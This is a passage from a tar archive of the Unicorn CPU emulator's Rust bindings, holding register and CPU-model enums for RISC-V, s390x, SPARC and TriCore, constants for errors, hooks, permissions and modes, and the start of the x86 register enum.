X14 = 15, X15 = 16, X16 = 17, X17 = 18, X18 = 19, X19 = 20, X20 = 21, X21 = 22, X22 = 23, X23 = 24, X24 = 25, X25 = 26, X26 = 27, X27 = 28, X28 = 29, X29 = 30, X30 = 31, X31 = 32, // CSR USTATUS = 33, UIE = 34, UTVEC = 35, USCRATCH = 36, UEPC = 37, UCAUSE = 38, UTVAL = 39, UIP = 40, FFLAGS = 41, FRM = 42, FCSR = 43, CYCLE = 44, TIME = 45, INSTRET = 46, HPMCOUNTER3 = 47, HPMCOUNTER4 = 48, HPMCOUNTER5 = 49, HPMCOUNTER6 = 50, HPMCOUNTER7 = 51, HPMCOUNTER8 = 52, HPMCOUNTER9 = 53, HPMCOUNTER10 = 54, HPMCOUNTER11 = 55, HPMCOUNTER12 = 56, HPMCOUNTER13 = 57, HPMCOUNTER14 = 58, HPMCOUNTER15 = 59, HPMCOUNTER16 = 60, HPMCOUNTER17 = 61, HPMCOUNTER18 = 62, HPMCOUNTER19 = 63, HPMCOUNTER20 = 64, HPMCOUNTER21 = 65, HPMCOUNTER22 = 66, HPMCOUNTER23 = 67, HPMCOUNTER24 = 68, HPMCOUNTER25 = 69, HPMCOUNTER26 = 70, HPMCOUNTER27 = 71, HPMCOUNTER28 = 72, HPMCOUNTER29 = 73, HPMCOUNTER30 = 74, HPMCOUNTER31 = 75, CYCLEH = 76, TIMEH = 77, INSTRETH = 78, HPMCOUNTER3H = 79, HPMCOUNTER4H = 80, HPMCOUNTER5H = 81, HPMCOUNTER6H = 82, HPMCOUNTER7H = 83, HPMCOUNTER8H = 84, HPMCOUNTER9H = 85, HPMCOUNTER10H = 86, HPMCOUNTER11H = 87, HPMCOUNTER12H = 88, HPMCOUNTER13H = 89, HPMCOUNTER14H = 90, HPMCOUNTER15H = 91, HPMCOUNTER16H = 92, HPMCOUNTER17H = 93, HPMCOUNTER18H = 94, HPMCOUNTER19H = 95, HPMCOUNTER20H = 96, HPMCOUNTER21H = 97, HPMCOUNTER22H = 98, HPMCOUNTER23H = 99, HPMCOUNTER24H = 100, HPMCOUNTER25H = 101, HPMCOUNTER26H = 102, HPMCOUNTER27H = 103, HPMCOUNTER28H = 104, HPMCOUNTER29H = 105, HPMCOUNTER30H = 106, HPMCOUNTER31H = 107, MCYCLE = 108, MINSTRET = 109, MCYCLEH = 110, MINSTRETH = 111, MVENDORID = 112, MARCHID = 113, MIMPID = 114, MHARTID = 115, MSTATUS = 116, MISA = 117, MEDELEG = 118, MIDELEG = 119, MIE = 120, MTVEC = 121, MCOUNTEREN = 122, MSTATUSH = 123, MUCOUNTEREN = 124, MSCOUNTEREN = 125, MHCOUNTEREN = 126, MSCRATCH = 127, MEPC = 128, MCAUSE = 129, MTVAL = 130, MIP = 131, MBADADDR = 132, SSTATUS = 133, SEDELEG = 134, SIDELEG = 135, SIE = 136, STVEC = 137, SCOUNTEREN = 138, SSCRATCH = 139, SEPC = 140, SCAUSE = 141, STVAL = 142, SIP = 143, SBADADDR = 144, SPTBR = 145, SATP = 146, HSTATUS = 147, HEDELEG = 148, HIDELEG = 149, HIE = 150, HCOUNTEREN = 151, HTVAL = 152, HIP = 153, HTINST = 154, HGATP = 155, HTIMEDELTA = 156, HTIMEDELTAH = 157, // Floating-point registers F0 = 158, F1 = 159, F2 = 160, F3 = 161, F4 = 162, F5 = 163, F6 = 164, F7 = 165, F8 = 166, F9 = 167, F10 = 168, F11 = 169, F12 = 170, F13 = 171, F14 = 172, F15 = 173, F16 = 174, F17 = 175, F18 = 176, F19 = 177, F20 = 178, F21 = 179, F22 = 180, F23 = 181, F24 = 182, F25 = 183, F26 = 184, F27 = 185, F28 = 186, F29 = 187, F30 = 188, F31 = 189, PC = 190, ENDING = 191, } impl RegisterRISCV { // Alias registers // (assoc) ZERO = 1, // (assoc) RA = 2, // (assoc) SP = 3, // (assoc) GP = 4, // (assoc) TP = 5, // (assoc) T0 = 6, // (assoc) T1 = 7, // (assoc) T2 = 8, // (assoc) S0 = 9, // (assoc) FP = 9, // (assoc) S1 = 10, // (assoc) A0 = 11, // (assoc) A1 = 12, // (assoc) A2 = 13, // (assoc) A3 = 14, // (assoc) A4 = 15, // (assoc) A5 = 16, // (assoc) A6 = 17, // (assoc) A7 = 18, // (assoc) S2 = 19, // (assoc) S3 = 20, // (assoc) S4 = 21, // (assoc) S5 = 22, // (assoc) S6 = 23, // (assoc) S7 = 24, // (assoc) S8 = 25, // (assoc) S9 = 26, // (assoc) S10 = 27, // (assoc) S11 = 28, // (assoc) T3 = 29, // (assoc) T4 = 30, // (assoc) T5 = 31, // (assoc) T6 = 32, // (assoc) FT0 = 158, // (assoc) FT1 = 159, // (assoc) FT2 = 160, // (assoc) FT3 = 161, // (assoc) FT4 = 162, // (assoc) FT5 = 163, // (assoc) FT6 = 164, // (assoc) FT7 = 165, // (assoc) FS0 = 166, // (assoc) FS1 = 167, // (assoc) FA0 = 168, // (assoc) FA1 = 169, // (assoc) FA2 = 170, // (assoc) FA3 = 171, // (assoc) FA4 = 172, // (assoc) FA5 = 173, // (assoc) FA6 = 174, // (assoc) FA7 = 175, // (assoc) FS2 = 176, // (assoc) FS3 = 177, // (assoc) FS4 = 178, // (assoc) FS5 = 179, // (assoc) FS6 = 180, // (assoc) FS7 = 181, // (assoc) FS8 = 182, // (assoc) FS9 = 183, // (assoc) FS10 = 184, // (assoc) FS11 = 185, // (assoc) FT8 = 186, // (assoc) FT9 = 187, // (assoc) FT10 = 188, // (assoc) FT11 = 189, pub const ZERO: RegisterRISCV = RegisterRISCV::X0; pub const RA: RegisterRISCV = RegisterRISCV::X1; pub const SP: RegisterRISCV = RegisterRISCV::X2; pub const GP: RegisterRISCV = RegisterRISCV::X3; pub const TP: RegisterRISCV = RegisterRISCV::X4; pub const T0: RegisterRISCV = RegisterRISCV::X5; pub const T1: RegisterRISCV = RegisterRISCV::X6; pub const T2: RegisterRISCV = RegisterRISCV::X7; pub const S0: RegisterRISCV = RegisterRISCV::X8; pub const FP: RegisterRISCV = RegisterRISCV::X8; pub const S1: RegisterRISCV = RegisterRISCV::X9; pub const A0: RegisterRISCV = RegisterRISCV::X10; pub const A1: RegisterRISCV = RegisterRISCV::X11; pub const A2: RegisterRISCV = RegisterRISCV::X12; pub const A3: RegisterRISCV = RegisterRISCV::X13; pub const A4: RegisterRISCV = RegisterRISCV::X14; pub const A5: RegisterRISCV = RegisterRISCV::X15; pub const A6: RegisterRISCV = RegisterRISCV::X16; pub const A7: RegisterRISCV = RegisterRISCV::X17; pub const S2: RegisterRISCV = RegisterRISCV::X18; pub const S3: RegisterRISCV = RegisterRISCV::X19; pub const S4: RegisterRISCV = RegisterRISCV::X20; pub const S5: RegisterRISCV = RegisterRISCV::X21; pub const S6: RegisterRISCV = RegisterRISCV::X22; pub const S7: RegisterRISCV = RegisterRISCV::X23; pub const S8: RegisterRISCV = RegisterRISCV::X24; pub const S9: RegisterRISCV = RegisterRISCV::X25; pub const S10: RegisterRISCV = RegisterRISCV::X26; pub const S11: RegisterRISCV = RegisterRISCV::X27; pub const T3: RegisterRISCV = RegisterRISCV::X28; pub const T4: RegisterRISCV = RegisterRISCV::X29; pub const T5: RegisterRISCV = RegisterRISCV::X30; pub const T6: RegisterRISCV = RegisterRISCV::X31; pub const FT0: RegisterRISCV = RegisterRISCV::F0; pub const FT1: RegisterRISCV = RegisterRISCV::F1; pub const FT2: RegisterRISCV = RegisterRISCV::F2; pub const FT3: RegisterRISCV = RegisterRISCV::F3; pub const FT4: RegisterRISCV = RegisterRISCV::F4; pub const FT5: RegisterRISCV = RegisterRISCV::F5; pub const FT6: RegisterRISCV = RegisterRISCV::F6; pub const FT7: RegisterRISCV = RegisterRISCV::F7; pub const FS0: RegisterRISCV = RegisterRISCV::F8; pub const FS1: RegisterRISCV = RegisterRISCV::F9; pub const FA0: RegisterRISCV = RegisterRISCV::F10; pub const FA1: RegisterRISCV = RegisterRISCV::F11; pub const FA2: RegisterRISCV = RegisterRISCV::F12; pub const FA3: RegisterRISCV = RegisterRISCV::F13; pub const FA4: RegisterRISCV = RegisterRISCV::F14; pub const FA5: RegisterRISCV = RegisterRISCV::F15; pub const FA6: RegisterRISCV = RegisterRISCV::F16; pub const FA7: RegisterRISCV = RegisterRISCV::F17; pub const FS2: RegisterRISCV = RegisterRISCV::F18; pub const FS3: RegisterRISCV = RegisterRISCV::F19; pub const FS4: RegisterRISCV = RegisterRISCV::F20; pub const FS5: RegisterRISCV = RegisterRISCV::F21; pub const FS6: RegisterRISCV = RegisterRISCV::F22; pub const FS7: RegisterRISCV = RegisterRISCV::F23; pub const FS8: RegisterRISCV = RegisterRISCV::F24; pub const FS9: RegisterRISCV = RegisterRISCV::F25; pub const FS10: RegisterRISCV = RegisterRISCV::F26; pub const FS11: RegisterRISCV = RegisterRISCV::F27; pub const FT8: RegisterRISCV = RegisterRISCV::F28; pub const FT9: RegisterRISCV = RegisterRISCV::F29; pub const FT10: RegisterRISCV = RegisterRISCV::F30; pub const FT11: RegisterRISCV = RegisterRISCV::F31; } impl From<RegisterRISCV> for i32 { fn from(r: RegisterRISCV) -> Self { r as i32 } } #[repr(i32)] #[derive(Debug, Copy, Clone, PartialEq, Eq)] pub enum Riscv32CpuModel { UC_CPU_RISCV32_ANY = 0, UC_CPU_RISCV32_BASE32, UC_CPU_RISCV32_SIFIVE_E31, UC_CPU_RISCV32_SIFIVE_U34, } impl From<Riscv32CpuModel> for i32 { fn from(value: Riscv32CpuModel) -> Self { value as i32 } } impl From<&Riscv32CpuModel> for i32 { fn from(value: &Riscv32CpuModel) -> Self { (*value) as i32 } } #[repr(i32)] #[derive(Debug, Copy, Clone, PartialEq, Eq)] pub enum Riscv64CpuModel { UC_CPU_RISCV64_ANY = 0, UC_CPU_RISCV64_BASE64, UC_CPU_RISCV64_SIFIVE_E51, UC_CPU_RISCV64_SIFIVE_U54, } impl From<Riscv64CpuModel> for i32 { fn from(value: Riscv64CpuModel) -> Self { value as i32 } } impl From<&Riscv64CpuModel> for i32 { fn from(value: &Riscv64CpuModel) -> Self { (*value) as i32 } } ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/rust/src/s390x.rs������������������������������������������������������������0000664�0000000�0000000�00000004625�14675241067�0020030�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#![allow(non_camel_case_types)] // S390X registers #[repr(C)] #[derive(PartialEq, Debug, Clone, Copy)] pub enum RegisterS390X { INVALID = 0, // General purpose registers R0 = 1, R1 = 2, R2 = 3, R3 = 4, R4 = 5, R5 = 6, R6 = 7, R7 = 8, R8 = 9, R9 = 10, R10 = 11, R11 = 12, R12 = 13, R13 = 14, R14 = 15, R15 = 16, // Floating point registers F0 = 17, F1 = 18, F2 = 19, F3 = 20, F4 = 21, F5 = 22, F6 = 23, F7 = 24, F8 = 25, F9 = 26, F10 = 27, F11 = 28, F12 = 29, F13 = 30, F14 = 31, F15 = 32, F16 = 33, F17 = 34, F18 = 35, F19 = 36, F20 = 37, F21 = 38, F22 = 39, F23 = 40, F24 = 41, F25 = 42, F26 = 43, F27 = 44, F28 = 45, F29 = 46, F30 = 47, F31 = 48, // Access registers A0 = 49, A1 = 50, A2 = 51, A3 = 52, A4 = 53, A5 = 54, A6 = 55, A7 = 56, A8 = 57, A9 = 58, A10 = 59, A11 = 60, A12 = 61, A13 = 62, A14 = 63, A15 = 64, PC = 65, PSWM = 66, ENDING = 67, } impl From<RegisterS390X> for i32 { fn from(r: RegisterS390X) -> Self { r as i32 } } #[repr(i32)] #[derive(Debug, Copy, Clone, PartialEq, Eq)] pub enum S390xCpuModel { UC_CPU_S390X_Z900 = 0, UC_CPU_S390X_Z900_2, UC_CPU_S390X_Z900_3, UC_CPU_S390X_Z800, UC_CPU_S390X_Z990, UC_CPU_S390X_Z990_2, UC_CPU_S390X_Z990_3, UC_CPU_S390X_Z890, UC_CPU_S390X_Z990_4, UC_CPU_S390X_Z890_2, UC_CPU_S390X_Z990_5, UC_CPU_S390X_Z890_3, UC_CPU_S390X_Z9EC, UC_CPU_S390X_Z9EC_2, UC_CPU_S390X_Z9BC, UC_CPU_S390X_Z9EC_3, UC_CPU_S390X_Z9BC_2, UC_CPU_S390X_Z10EC, UC_CPU_S390X_Z10EC_2, UC_CPU_S390X_Z10BC, UC_CPU_S390X_Z10EC_3, UC_CPU_S390X_Z10BC_2, UC_CPU_S390X_Z196, UC_CPU_S390X_Z196_2, UC_CPU_S390X_Z114, UC_CPU_S390X_ZEC12, UC_CPU_S390X_ZEC12_2, UC_CPU_S390X_ZBC12, UC_CPU_S390X_Z13, UC_CPU_S390X_Z13_2, UC_CPU_S390X_Z13S, UC_CPU_S390X_Z14, UC_CPU_S390X_Z14_2, UC_CPU_S390X_Z14ZR1, UC_CPU_S390X_GEN15A, UC_CPU_S390X_GEN15B, UC_CPU_S390X_QEMU, } impl From<S390xCpuModel> for i32 { fn from(value: S390xCpuModel) -> Self { value as i32 } } impl From<&S390xCpuModel> for i32 { fn from(value: &S390xCpuModel) -> Self { (*value) as i32 } } �����������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/rust/src/sparc.rs������������������������������������������������������������0000664�0000000�0000000�00000006535�14675241067�0020254�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#![allow(non_camel_case_types)] // SPARC registers #[repr(C)] #[derive(PartialEq, Debug, Clone, Copy)] #[allow(clippy::upper_case_acronyms)] pub enum RegisterSPARC { INVALID = 0, F0 = 1, F1 = 2, F2 = 3, F3 = 4, F4 = 5, F5 = 6, F6 = 7, F7 = 8, F8 = 9, F9 = 10, F10 = 11, F11 = 12, F12 = 13, F13 = 14, F14 = 15, F15 = 16, F16 = 17, F17 = 18, F18 = 19, F19 = 20, F20 = 21, F21 = 22, F22 = 23, F23 = 24, F24 = 25, F25 = 26, F26 = 27, F27 = 28, F28 = 29, F29 = 30, F30 = 31, F31 = 32, F32 = 33, F34 = 34, F36 = 35, F38 = 36, F40 = 37, F42 = 38, F44 = 39, F46 = 40, F48 = 41, F50 = 42, F52 = 43, F54 = 44, F56 = 45, F58 = 46, F60 = 47, F62 = 48, FCC0 = 49, FCC1 = 50, FCC2 = 51, FCC3 = 52, G0 = 53, G1 = 54, G2 = 55, G3 = 56, G4 = 57, G5 = 58, G6 = 59, G7 = 60, I0 = 61, I1 = 62, I2 = 63, I3 = 64, I4 = 65, I5 = 66, FP = 67, I7 = 68, ICC = 69, L0 = 70, L1 = 71, L2 = 72, L3 = 73, L4 = 74, L5 = 75, L6 = 76, L7 = 77, O0 = 78, O1 = 79, O2 = 80, O3 = 81, O4 = 82, O5 = 83, SP = 84, O7 = 85, Y = 86, XCC = 87, PC = 88, ENDING = 89, } impl RegisterSPARC { // alias registers // (assoc) O6 = 84, // (assoc) I6 = 67, pub const O6: RegisterSPARC = RegisterSPARC::SP; pub const I6: RegisterSPARC = RegisterSPARC::FP; } impl From<RegisterSPARC> for i32 { fn from(r: RegisterSPARC) -> Self { r as i32 } } #[repr(i32)] #[derive(Debug, Copy, Clone, PartialEq, Eq)] pub enum Sparc32CpuModel { UC_CPU_SPARC32_FUJITSU_MB86904 = 0, UC_CPU_SPARC32_FUJITSU_MB86907, UC_CPU_SPARC32_TI_MICROSPARC_I, UC_CPU_SPARC32_TI_MICROSPARC_II, UC_CPU_SPARC32_TI_MICROSPARC_IIEP, UC_CPU_SPARC32_TI_SUPERSPARC_40, UC_CPU_SPARC32_TI_SUPERSPARC_50, UC_CPU_SPARC32_TI_SUPERSPARC_51, UC_CPU_SPARC32_TI_SUPERSPARC_60, UC_CPU_SPARC32_TI_SUPERSPARC_61, UC_CPU_SPARC32_TI_SUPERSPARC_II, UC_CPU_SPARC32_LEON2, UC_CPU_SPARC32_LEON3, } impl From<Sparc32CpuModel> for i32 { fn from(value: Sparc32CpuModel) -> Self { value as i32 } } impl From<&Sparc32CpuModel> for i32 { fn from(value: &Sparc32CpuModel) -> Self { (*value) as i32 } } #[repr(i32)] #[derive(Debug, Copy, Clone, PartialEq, Eq)] pub enum Sparc64CpuModel { UC_CPU_SPARC64_FUJITSU = 0, UC_CPU_SPARC64_FUJITSU_III, UC_CPU_SPARC64_FUJITSU_IV, UC_CPU_SPARC64_FUJITSU_V, UC_CPU_SPARC64_TI_ULTRASPARC_I, UC_CPU_SPARC64_TI_ULTRASPARC_II, UC_CPU_SPARC64_TI_ULTRASPARC_III, UC_CPU_SPARC64_TI_ULTRASPARC_IIE, UC_CPU_SPARC64_SUN_ULTRASPARC_III, UC_CPU_SPARC64_SUN_ULTRASPARC_III_CU, UC_CPU_SPARC64_SUN_ULTRASPARC_IIII, UC_CPU_SPARC64_SUN_ULTRASPARC_IV, UC_CPU_SPARC64_SUN_ULTRASPARC_IV_PLUS, UC_CPU_SPARC64_SUN_ULTRASPARC_IIII_PLUS, UC_CPU_SPARC64_SUN_ULTRASPARC_T1, UC_CPU_SPARC64_SUN_ULTRASPARC_T2, UC_CPU_SPARC64_NEC_ULTRASPARC_I, } impl From<Sparc64CpuModel> for i32 { fn from(value: Sparc64CpuModel) -> Self { value as i32 } } impl From<&Sparc64CpuModel> for i32 { fn from(value: &Sparc64CpuModel) -> Self { (*value) as i32 } } �������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/rust/src/tricore.rs����������������������������������������������������������0000664�0000000�0000000�00000005632�14675241067�0020610�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#![allow(non_camel_case_types)] // TRICORE registers #[repr(C)] #[derive(PartialEq, Debug, Clone, Copy)] pub enum RegisterTRICORE { INVALID = 0, A0 = 1, A1 = 2, A2 = 3, A3 = 4, A4 = 5, A5 = 6, A6 = 7, A7 = 8, A8 = 9, A9 = 10, A10 = 11, A11 = 12, A12 = 13, A13 = 14, A14 = 15, A15 = 16, D0 = 17, D1 = 18, D2 = 19, D3 = 20, D4 = 21, D5 = 22, D6 = 23, D7 = 24, D8 = 25, D9 = 26, D10 = 27, D11 = 28, D12 = 29, D13 = 30, D14 = 31, D15 = 32, PCXI = 33, PSW = 34, PSW_USB_C = 35, PSW_USB_V = 36, PSW_USB_SV = 37, PSW_USB_AV = 38, PSW_USB_SAV = 39, PC = 40, SYSCON = 41, CPU_ID = 42, BIV = 43, BTV = 44, ISP = 45, ICR = 46, FCX = 47, LCX = 48, COMPAT = 49, DPR0_U = 50, DPR1_U = 51, DPR2_U = 52, DPR3_U = 53, DPR0_L = 54, DPR1_L = 55, DPR2_L = 56, DPR3_L = 57, CPR0_U = 58, CPR1_U = 59, CPR2_U = 60, CPR3_U = 61, CPR0_L = 62, CPR1_L = 63, CPR2_L = 64, CPR3_L = 65, DPM0 = 66, DPM1 = 67, DPM2 = 68, DPM3 = 69, CPM0 = 70, CPM1 = 71, CPM2 = 72, CPM3 = 73, MMU_CON = 74, MMU_ASI = 75, MMU_TVA = 76, MMU_TPA = 77, MMU_TPX = 78, MMU_TFA = 79, BMACON = 80, SMACON = 81, DIEAR = 82, DIETR = 83, CCDIER = 84, MIECON = 85, PIEAR = 86, PIETR = 87, CCPIER = 88, DBGSR = 89, EXEVT = 90, CREVT = 91, SWEVT = 92, TR0EVT = 93, TR1EVT = 94, DMS = 95, DCX = 96, DBGTCR = 97, CCTRL = 98, CCNT = 99, ICNT = 100, M1CNT = 101, M2CNT = 102, M3CNT = 103, ENDING = 104, } impl RegisterTRICORE { // alias registers // (assoc) GA0 = 1, // (assoc) GA1 = 2, // (assoc) GA8 = 9, // (assoc) GA9 = 10, // (assoc) SP = 11, // (assoc) LR = 12, // (assoc) IA = 16, // (assoc) ID = 32, pub const GA0: RegisterTRICORE = RegisterTRICORE::A0; pub const GA1: RegisterTRICORE = RegisterTRICORE::A1; pub const GA8: RegisterTRICORE = RegisterTRICORE::A8; pub const GA9: RegisterTRICORE = RegisterTRICORE::A9; pub const SP: RegisterTRICORE = RegisterTRICORE::A10; pub const LR: RegisterTRICORE = RegisterTRICORE::A11; pub const IA: RegisterTRICORE = RegisterTRICORE::A15; pub const ID: RegisterTRICORE = RegisterTRICORE::D15; } impl From<RegisterTRICORE> for i32 { fn from(r: RegisterTRICORE) -> Self { r as i32 } } #[repr(i32)] #[derive(Debug, Copy, Clone, PartialEq, Eq)] pub enum TricoreCpuModel { UC_CPU_TRICORE_TC1796, UC_CPU_TRICORE_TC1797, UC_CPU_TRICORE_TC27X, } impl From<TricoreCpuModel> for i32 { fn from(value: TricoreCpuModel) -> Self { value as i32 } } impl From<&TricoreCpuModel> for i32 { fn from(value: &TricoreCpuModel) -> Self { (*value) as i32 } } ������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/rust/src/unicorn_const.rs����������������������������������������������������0000664�0000000�0000000�00000017163�14675241067�0022026�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#![allow(non_camel_case_types)] use bitflags::bitflags; pub const API_MAJOR: u64 = 2; pub const API_MINOR: u64 = 0; pub const VERSION_MAJOR: u64 = 2; pub const VERSION_MINOR: u64 = 0; pub const VERSION_PATCH: u64 = 0; pub const VERSION_EXTRA: u64 = 7; pub const SECOND_SCALE: u64 = 1_000_000; pub const MILISECOND_SCALE: u64 = 1_000; #[repr(C)] #[derive(PartialEq, Debug, Clone, Copy)] #[allow(clippy::upper_case_acronyms)] pub enum uc_error { OK = 0, NOMEM = 1, ARCH = 2, HANDLE = 3, MODE = 4, VERSION = 5, READ_UNMAPPED = 6, WRITE_UNMAPPED = 7, FETCH_UNMAPPED = 8, HOOK = 9, INSN_INVALID = 10, MAP = 11, WRITE_PROT = 12, READ_PROT = 13, FETCH_PROT = 14, ARG = 15, READ_UNALIGNED = 16, WRITE_UNALIGNED = 17, FETCH_UNALIGNED = 18, HOOK_EXIST = 19, RESOURCE = 20, EXCEPTION = 21, } impl uc_error { /// Calls op if the result is Ok, otherwise returns the Err value of self. /// This function can be used for control flow based on Result values. pub fn and_then<U, F: FnOnce() -> Result<U, uc_error>>(self, op: F) -> Result<U, uc_error> { if let Self::OK = self { op() } else { Err(self) } } /// Returns res if the result is Ok, otherwise returns the Err value of self. /// Arguments passed to and are eagerly evaluated; if you are passing the result /// of a function call, it is recommended to use and_then, which is lazily evaluated. pub fn and<U>(self, res: Result<U, uc_error>) -> Result<U, uc_error> { if let Self::OK = self { res } else { Err(self) } } } impl From<uc_error> for Result<(), uc_error> { fn from(value: uc_error) -> Self { if let uc_error::OK = value { Ok(()) } else { Err(value) } } } #[repr(C)] #[derive(PartialEq, Debug, Clone, Copy)] pub enum MemType { READ = 16, WRITE = 17, FETCH = 18, READ_UNMAPPED = 19, WRITE_UNMAPPED = 20, FETCH_UNMAPPED = 21, WRITE_PROT = 22, READ_PROT = 23, FETCH_PROT = 24, READ_AFTER = 25, } #[repr(C)] #[derive(PartialEq, Debug, Clone, Copy)] pub enum TlbType { CPU = 0, VIRTUAL = 1, } bitflags! { #[repr(C)] #[derive(Copy, Clone)] pub struct HookType: i32 { const INTR = 1; const INSN = 2; const CODE = 4; const BLOCK = 8; const MEM_READ_UNMAPPED = 0x10; const MEM_WRITE_UNMAPPED = 0x20; const MEM_FETCH_UNMAPPED = 0x40; const MEM_UNMAPPED = Self::MEM_READ_UNMAPPED.bits() | Self::MEM_WRITE_UNMAPPED.bits() | Self::MEM_FETCH_UNMAPPED.bits(); const MEM_READ_PROT = 0x80; const MEM_WRITE_PROT = 0x100; const MEM_FETCH_PROT = 0x200; const MEM_PROT = Self::MEM_READ_PROT.bits() | Self::MEM_WRITE_PROT.bits() | Self::MEM_FETCH_PROT.bits(); const MEM_READ = 0x400; const MEM_WRITE = 0x800; const MEM_FETCH = 0x1000; const MEM_VALID = Self::MEM_READ.bits() | Self::MEM_WRITE.bits() | Self::MEM_FETCH.bits(); const MEM_READ_AFTER = 0x2000; const INSN_INVALID = 0x4000; const MEM_READ_INVALID = Self::MEM_READ_UNMAPPED.bits() | Self::MEM_READ_PROT.bits(); const MEM_WRITE_INVALID = Self::MEM_WRITE_UNMAPPED.bits() | Self::MEM_WRITE_PROT.bits(); const MEM_FETCH_INVALID = Self::MEM_FETCH_UNMAPPED.bits() | Self::MEM_FETCH_PROT.bits(); const MEM_INVALID = Self::MEM_READ_INVALID.bits() | Self::MEM_WRITE_INVALID.bits() | Self::MEM_FETCH_INVALID.bits(); const MEM_ALL = Self::MEM_VALID.bits() | Self::MEM_INVALID.bits(); const TLB = (1 << 17); } } #[repr(C)] #[derive(PartialEq, Debug, Clone, Copy)] #[allow(clippy::upper_case_acronyms)] pub enum Query { MODE = 1, PAGE_SIZE = 2, ARCH = 3, TIMEOUT = 4, } bitflags! { #[repr(C)] #[derive(Copy, Clone, Debug)] pub struct Permission : u32 { const NONE = 0; const READ = 1; const WRITE = 2; const EXEC = 4; const ALL = Self::READ.bits() | Self::WRITE.bits() | Self::EXEC.bits(); } } #[repr(C)] #[derive(Debug, Clone)] pub struct MemRegion { pub begin: u64, pub end: u64, pub perms: Permission, } #[repr(C)] #[derive(PartialEq, Debug, Clone, Copy)] pub enum Arch { ARM = 1, ARM64 = 2, MIPS = 3, X86 = 4, PPC = 5, SPARC = 6, M68K = 7, RISCV = 8, S390X = 9, TRICORE = 10, MAX = 11, } impl TryFrom<usize> for Arch { type Error = uc_error; fn try_from(v: usize) -> Result<Self, Self::Error> { match v { x if x == Self::ARM as usize => Ok(Self::ARM), x if x == Self::ARM64 as usize => Ok(Self::ARM64), x if x == Self::MIPS as usize => Ok(Self::MIPS), x if x == Self::X86 as usize => Ok(Self::X86), x if x == Self::PPC as usize => Ok(Self::PPC), x if x == Self::SPARC as usize => Ok(Self::SPARC), x if x == Self::M68K as usize => Ok(Self::M68K), x if x == Self::RISCV as usize => Ok(Self::RISCV), x if x == Self::S390X as usize => Ok(Self::S390X), x if x == Self::TRICORE as usize => Ok(Self::TRICORE), x if x == Self::MAX as usize => Ok(Self::MAX), _ => Err(uc_error::ARCH), } } } bitflags! { #[derive(Copy, Clone)] #[repr(C)] pub struct Mode: i32 { const LITTLE_ENDIAN = 0; const BIG_ENDIAN = 0x4000_0000; const ARM = 0; const THUMB = 0x10; const MCLASS = 0x20; const V8 = 0x40; const ARMBE8 = 0x400; const ARM926 = 0x80; const ARM946 = 0x100; const ARM1176 = 0x200; const MICRO = Self::THUMB.bits(); const MIPS3 = Self::MCLASS.bits(); const MIPS32R6 = Self::V8.bits(); const MIPS32 = 4; const MIPS64 = 8; const MODE_16 = 2; const MODE_32 = Self::MIPS32.bits(); const MODE_64 = Self::MIPS64.bits(); const PPC32 = Self::MIPS32.bits(); const PPC64 = Self::MIPS64.bits(); const QPX = Self::THUMB.bits(); const SPARC32 = Self::MIPS32.bits(); const SPARC64 = Self::MIPS64.bits(); const V9 = Self::THUMB.bits(); const RISCV32 = Self::MIPS32.bits(); const RISCV64 = Self::MIPS64.bits(); } } // Represent a TranslationBlock. #[repr(C)] pub struct TranslationBlock { pub pc: u64, pub icount: u16, pub size: u16, } macro_rules! UC_CTL_READ { ($expr:expr) => { $expr as u32 | ControlType::UC_CTL_IO_READ as u32 }; } macro_rules! UC_CTL_WRITE { ($expr:expr) => { $expr as u32 | ControlType::UC_CTL_IO_WRITE as u32 }; } macro_rules! UC_CTL_READ_WRITE { ($expr:expr) => { $expr as u32 | ControlType::UC_CTL_IO_WRITE as u32 | ControlType::UC_CTL_IO_READ as u32 }; } #[allow(clippy::upper_case_acronyms)] #[repr(u64)] pub enum ControlType { UC_CTL_UC_MODE = 0, UC_CTL_UC_PAGE_SIZE = 1, UC_CTL_UC_ARCH = 2, UC_CTL_UC_TIMEOUT = 3, UC_CTL_UC_USE_EXITS = 4, UC_CTL_UC_EXITS_CNT = 5, UC_CTL_UC_EXITS = 6, UC_CTL_CPU_MODEL = 7, UC_CTL_TB_REQUEST_CACHE = 8, UC_CTL_TB_REMOVE_CACHE = 9, UC_CTL_TB_FLUSH = 10, UC_CTL_TLB_FLUSH = 11, UC_CTL_TLB_TYPE = 12, UC_CTL_TCG_BUFFER_SIZE = 13, UC_CTL_CONTEXT_MODE = 14, UC_CTL_IO_READ = 1 << 31, UC_CTL_IO_WRITE = 1 << 30, } bitflags! { #[derive(Debug, Copy, Clone)] #[repr(C)] pub struct ContextMode : u32 { const CPU = 1; const Memory = 2; } } #[repr(C)] #[derive(Debug, Clone, Copy)] pub struct TlbEntry { pub paddr: u64, pub perms: Permission, } �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/rust/src/x86.rs��������������������������������������������������������������0000664�0000000�0000000�00000013216�14675241067�0017563�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#![allow(non_camel_case_types)] // X86 registers #[repr(C)] #[derive(PartialEq, Debug, Clone, Copy)] #[allow(clippy::upper_case_acronyms)] pub enum RegisterX86 { INVALID = 0, AH = 1, AL = 2, AX = 3, BH = 4, BL = 5, BP = 6, BPL = 7, BX = 8, CH = 9, CL = 10, CS = 11, CX = 12, DH = 13, DI = 14, DIL = 15, DL = 16, DS = 17, DX = 18, EAX = 19, EBP = 20, EBX = 21, ECX = 22, EDI = 23, EDX = 24, EFLAGS = 25, EIP = 26, ES = 28, ESI = 29, ESP = 30, FPSW = 31, FS = 32, 